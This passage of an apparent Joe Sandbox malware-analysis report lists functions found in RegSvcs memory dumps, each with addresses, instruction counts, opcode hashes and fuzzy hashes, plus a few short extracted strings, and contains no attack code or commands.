                                            Function 06A55051 Relevance: .1, Instructions: 135COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e3b5c24fec1ebc89b00f532aa95046bb847cc719a4c87084bc1e2db0ca37ac9c
                                            • Instruction ID: 552ec994387fe08493e45f704835492883bedd00d9e6bcd8e5fb7fc2a210894a
                                            • Opcode Fuzzy Hash: e3b5c24fec1ebc89b00f532aa95046bb847cc719a4c87084bc1e2db0ca37ac9c
                                            • Instruction Fuzzy Hash: 8C41A271E002099FDF70EFA9C880AAFFBB1FB45310F11492AE556D7240D331A8458B90
                                            Function 06A520B8 Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28d90aa9c96bc8ba32420c984f5f3f55aa9e7b0a664b765326b25bfd0f55d268
                                            • Instruction ID: b919478ee31924a5ef102d4998d0224347a63f215b6883c0e01c8988edec7204
                                            • Opcode Fuzzy Hash: 28d90aa9c96bc8ba32420c984f5f3f55aa9e7b0a664b765326b25bfd0f55d268
                                            • Instruction Fuzzy Hash: 7931CE30E042469FCB59DF64C89469EBBB2BF8A300F10C41AE906EB751DB35AD46CB51
                                            Function 06A520C8 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 54085acfb94431d26711ee79000a73ca6e992d38323c6048fddc1925aabbd89a
                                            • Instruction ID: 7f09a63c2cb4e453f8009c0cdd5f621e7dac17fecf466c96848ab51b14db0880
                                            • Opcode Fuzzy Hash: 54085acfb94431d26711ee79000a73ca6e992d38323c6048fddc1925aabbd89a
                                            • Instruction Fuzzy Hash: 1F317A30E0020A9FDB59DF65C89469EB7B2FF89310F11C929E90AEB750DB75AD42CB50
                                            Function 06A53AE0 Relevance: .1, Instructions: 81COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30fb2f66e425b214b088b2d2b5fd6ad4c5466eb3bc871b210304c32fe8f70ec3
                                            • Instruction ID: 0c161789f724710c8222ea11166097e02d223b5c6595adedb47f5a5f600c1762
                                            • Opcode Fuzzy Hash: 30fb2f66e425b214b088b2d2b5fd6ad4c5466eb3bc871b210304c32fe8f70ec3
                                            • Instruction Fuzzy Hash: CF219C75F106059FDF50EF69D880AAEBBF1EB88350F118029E909EB381E734DD418B91
                                            Function 06A53AF0 Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cbbcf37bac6d17de5c9a35f9d6cab8a1661b0596e6243aea14a59c2a7c04a4a0
                                            • Instruction ID: 9c8da27bc62cdc914cf2fa797e7c22b5086c992dfa9e26f7d54253ee4f320800
                                            • Opcode Fuzzy Hash: cbbcf37bac6d17de5c9a35f9d6cab8a1661b0596e6243aea14a59c2a7c04a4a0
                                            • Instruction Fuzzy Hash: B4218B75E106059FDF50EF69D880AAEB7F1EB88350F118029E905EB381E735DD418B95
                                            Function 02EED01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4515127462.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_2eed000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9ae2add9d303fc538d0c2e0be990622bae10f60fe1ae38ccb1f6e5866a7e8597
                                            • Instruction ID: b4fbc510cd73e2fb98d969ce404fc513d7850e8cdc1c57d37275c9d9ab87fa2f
                                            • Opcode Fuzzy Hash: 9ae2add9d303fc538d0c2e0be990622bae10f60fe1ae38ccb1f6e5866a7e8597
                                            • Instruction Fuzzy Hash: 8D21F2B1684240DFDF14DF14D9C4B26BBAAFB84318F28C56DD80B4B286C33AD807CA61
                                            Function 02EED005 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4515127462.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_2eed000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7709887e6215b3ba93ba69b7474f3a45d64b26564b58bb7135bdc7632eb7903b
                                            • Instruction ID: 85388d557d429943dde87967ed3693d223c493f742efafbce24f476fc1867fc1
                                            • Opcode Fuzzy Hash: 7709887e6215b3ba93ba69b7474f3a45d64b26564b58bb7135bdc7632eb7903b
                                            • Instruction Fuzzy Hash: 162165755493C08FDB12CF24D994715BF72EB46214F28C5DAD8498F6A7C33A940ACB62
                                            Function 06A5A350 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f8ed6c2e510e8e4830d491dffb890434850970811bc283e08ff4812523f8f1e
                                            • Instruction ID: 3ab52d82337a0aefe0892153c524dd9805526970e2158af3eda863fab14ccbd0
                                            • Opcode Fuzzy Hash: 5f8ed6c2e510e8e4830d491dffb890434850970811bc283e08ff4812523f8f1e
                                            • Instruction Fuzzy Hash: 3811D2347001152BCB61E63DD850B6FBBD6EB86668F118529FA0ECB742EA28CC4687D5
                                            Function 06A53C00 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: da87f2e61ece0753c8b66a369243893e9282445477532a96b990b068caa651ec
                                            • Instruction ID: fb8382dbe5675059435b96d38b6dd5bf69e9fe277fcacfc673afbde20ee61b87
                                            • Opcode Fuzzy Hash: da87f2e61ece0753c8b66a369243893e9282445477532a96b990b068caa651ec
                                            • Instruction Fuzzy Hash: CD116132B141258BDF54E769D8246AE73BAEBC8350F018539D90AEB350EF35DC0A8BD1
                                            Function 06A538B8 Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 49b2601bb25412117a32262d9407bf13d6c163403f3d6ae3ea98091f059ac1e7
                                            • Instruction ID: 75468b26a1a205a27b94f6642f577989258e8026cb15793ac197194287eab9a1
                                            • Opcode Fuzzy Hash: 49b2601bb25412117a32262d9407bf13d6c163403f3d6ae3ea98091f059ac1e7
                                            • Instruction Fuzzy Hash: 8321E0B5C01259AFCB00DF9AD884ACEFFB8FB48350F10812AE918A7300C374A554CFA5
                                            Function 06A53E37 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 56020bda7e4d5a7467e6e08104c3d6e1a65c11667f352645a984636f48e32f1d
                                            • Instruction ID: d7a856d49cc9bf101c9208d6acec1eaf389e623d03da407a502d527c2bc72a0b
                                            • Opcode Fuzzy Hash: 56020bda7e4d5a7467e6e08104c3d6e1a65c11667f352645a984636f48e32f1d
                                            • Instruction Fuzzy Hash: 3501F131B040101BDF21E66EA45475FBBCBDBC6654F10883DE90ECB782E939CC424391
                                            Function 06A5EDD8 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43a1efc5b6163b340b91ebfaa85426888d2d086fb360345af9353a2c85ac9969
                                            • Instruction ID: 9dcfb8f58e2961ac0503fc3590b43c57604acd88823bbaa1f17d6e21b911db56
                                            • Opcode Fuzzy Hash: 43a1efc5b6163b340b91ebfaa85426888d2d086fb360345af9353a2c85ac9969
                                            • Instruction Fuzzy Hash: 7001F131B100102BCB21EA3C9490B2FB7D7EBCA624F118829E90ECB341DA29DC0743A1
                                            Function 06A53BF0 Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7bce8ecf321c706ad554ee2f72e28b5f4b470e6465bc9b6705eefb5610459f01
                                            • Instruction ID: bae22e2eea6577a438bd98cc5a8c041bca19dfaf526ecb2a622dc84978ec85a5
                                            • Opcode Fuzzy Hash: 7bce8ecf321c706ad554ee2f72e28b5f4b470e6465bc9b6705eefb5610459f01
                                            • Instruction Fuzzy Hash: E1018F32B141255BEF55EA69DC206EB72EBEBC8750F018439E90AD7380EF25DC0A47D2
                                            Function 06A5309D Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1d74de2804fc0904b790f730fca0e2b2ed7e7cebb82ee4854ae7f0bef7ee9c63
                                            • Instruction ID: b7793709cdacc2db49920d5de43461a9ee24f72d97cb0244e99b6a8b112390d2
                                            • Opcode Fuzzy Hash: 1d74de2804fc0904b790f730fca0e2b2ed7e7cebb82ee4854ae7f0bef7ee9c63
                                            • Instruction Fuzzy Hash: 8F116171E002149FCF68EB79D8405DEF7B2BBC9350F15856AD90AEB240EA308941CBA1
                                            Function 06A538C0 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 81064a31ca5ad501ea61da3733bd8dda2728d4ad38b41da26dd81e92d4d72f5c
                                            • Instruction ID: 2220f0258007aa70474ceea34c8db43dda4b923fefae0f416431e1b2f4a5a5e8
                                            • Opcode Fuzzy Hash: 81064a31ca5ad501ea61da3733bd8dda2728d4ad38b41da26dd81e92d4d72f5c
                                            • Instruction Fuzzy Hash: FE11CFB5D01259AFCB00DF9AD884ADEFBB8FB48310F50812AE918A7200D374A954CFA5
                                            Function 06A53E48 Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 271d02c5435d776f50cc9bf56e7f94e4ae49b9f19b7596fdf77b113267b94182
                                            • Instruction ID: a78e3958c0cc7d4aae58939130771d703d8a77fb0ecb5e183c518e633d012b24
                                            • Opcode Fuzzy Hash: 271d02c5435d776f50cc9bf56e7f94e4ae49b9f19b7596fdf77b113267b94182
                                            • Instruction Fuzzy Hash: 1701AD31B000110BDF60E66EA45472FB3CBDBCA664F218839E90ECB781E979DC024395
                                            Function 06A5EDE8 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 362df6b380dd4cdeea66f2a49d0cfc78564292bf97732e2e53f1cad34c53d5cf
                                            • Instruction ID: fd9438eb31532f80f790c35f9907ded567e53cb8ed789dbc3110c66d88f555ad
                                            • Opcode Fuzzy Hash: 362df6b380dd4cdeea66f2a49d0cfc78564292bf97732e2e53f1cad34c53d5cf
                                            • Instruction Fuzzy Hash: 1D01D131B100111BCB65E62D945472EB2D7EBCA624F218839E90ECB340DE29DD434395
                                            Function 06A5A360 Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7dddbc765e7cb0a147b0d19969e3cd7ffe1591e061580e130267fb2fea54752c
                                            • Instruction ID: 0ab3275f0eddeec7b9dfd62dd126053fd72a6f4d6479e220e6b677b076af2006
                                            • Opcode Fuzzy Hash: 7dddbc765e7cb0a147b0d19969e3cd7ffe1591e061580e130267fb2fea54752c
                                            • Instruction Fuzzy Hash: 3E01F435B000151FDB60EB3DD44072EF3D7EB89668F118929EA0ECB340EA39DC428784
                                            Function 06A5C818 Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 40e9fa06f3cc0a1d21d66694296713f2a40d2172644caa5b32897ec2484259dd
                                            • Instruction ID: e12f3bc9e9440e635f9f79aa9056238da4ad86a4e2aaa1f746a807d089324307
                                            • Opcode Fuzzy Hash: 40e9fa06f3cc0a1d21d66694296713f2a40d2172644caa5b32897ec2484259dd
                                            • Instruction Fuzzy Hash: BFF0A736F20234A7DB24A666EC00A9AB73AF784760F014429ED02E7244DA32AC10C7C0
                                            Function 06A564B0 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4044368050efacb89c3a62d2ed91baa2997545ef6e3606c88d8e41bb374f7ee9
                                            • Instruction ID: ed0bfcfeea1493977b19dedc1dfcdc4250f9c0174112b0bcf555b4d2b8cb3520
                                            • Opcode Fuzzy Hash: 4044368050efacb89c3a62d2ed91baa2997545ef6e3606c88d8e41bb374f7ee9
                                            • Instruction Fuzzy Hash: 68E0D871E102086BDB50EF74CE4575B76BDD701204F6248B5D809CF202E137CD028351

                                            Non-executed Functions

                                            Function 06A576E0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-2843079600
                                            • Opcode ID: 562ec316256fa9cfb1306557ce88f2fe32177c832252e16371c9633387d19486
                                            • Instruction ID: 538de48c101478b2e37ba2c80b674832998a5a8bbda32c45e49315b711126473
                                            • Opcode Fuzzy Hash: 562ec316256fa9cfb1306557ce88f2fe32177c832252e16371c9633387d19486
                                            • Instruction Fuzzy Hash: 38121C70E002198FDB65EF69C854AADB7F2BF88304F218969D909AB355DB34DD81CF81
                                            Function 06A5A988 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1273862796
                                            • Opcode ID: 7e563128e8f7bbc65d2d103ae0129b75bd500f5d629865170bf9e48c9160ca74
                                            • Instruction ID: 7bb80e42498ab37362fc452c1c7e527a8c27f14851d6e81b74620f678a13bb58
                                            • Opcode Fuzzy Hash: 7e563128e8f7bbc65d2d103ae0129b75bd500f5d629865170bf9e48c9160ca74
                                            • Instruction Fuzzy Hash: 7A915070B10209DFDB64EFA5D994B6EB7F2FF44340F128629DA019B291DB759C81CB90
                                            Function 06A570E0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-981061697
                                            • Opcode ID: 7aebe7f203fd08995ada80d5ccac5ed81b47935eb73047ec8751ee9fbd7b4c1e
                                            • Instruction ID: 750d63bdac6b764b86a1b001215e0d0111571907d2c370bd735aa07a68202b88
                                            • Opcode Fuzzy Hash: 7aebe7f203fd08995ada80d5ccac5ed81b47935eb73047ec8751ee9fbd7b4c1e
                                            • Instruction Fuzzy Hash: F6F11C70A10205DFDB59EF69C994A6EB7B3FF88340F218569D805AB354DB35EC82CB81
                                            Function 06A58418 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q
                                            • API String ID: 0-858218434
                                            • Opcode ID: 65ac50cb8e2321cabf03e2cbb8c4e338eff3d9f64dc5a399f29aebe25e78cd8a
                                            • Instruction ID: fea75a62704f30d4d7d29e9c4e74b6fc756032906d1f4dfe878acd445310e493
                                            • Opcode Fuzzy Hash: 65ac50cb8e2321cabf03e2cbb8c4e338eff3d9f64dc5a399f29aebe25e78cd8a
                                            • Instruction Fuzzy Hash: 93B11A70A11219CFDB54EF69C89466EB7B3FF88304F258829D8069B355DB79DC82CB81
                                            Function 06A58830 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q$$]q$$]q
                                            • API String ID: 0-3527005858
                                            • Opcode ID: 3b32e031918c1339bed793ed962910b19615564ca77a05c8745c79bfbbf9e2ce
                                            • Instruction ID: ab5e31656976b54afa6dc3c47e6b83d6b471c266e8dcce71444c4c8456366043
                                            • Opcode Fuzzy Hash: 3b32e031918c1339bed793ed962910b19615564ca77a05c8745c79bfbbf9e2ce
                                            • Instruction Fuzzy Hash: 7451B430B002159FDB54EB29D980A6AB7F2FF88344B118569E8069F3A5DB39EC41CB91
                                            Function 06A5AD1A Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4520594546.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_6a50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q
                                            • API String ID: 0-858218434
                                            • Opcode ID: 7af0ba3b32fe729287bc27368b5fa0d1626c4712323d661582225e0efae3093d
                                            • Instruction ID: d91fde15560b39463c0ac614a4a86df9fa576a557b800381a592ee9856f04590
                                            • Opcode Fuzzy Hash: 7af0ba3b32fe729287bc27368b5fa0d1626c4712323d661582225e0efae3093d
                                            • Instruction Fuzzy Hash: 6E517270B102059BDF65EB64D9806AEB3B2FF85311F218A2AEE06DB340DB35DC41CB91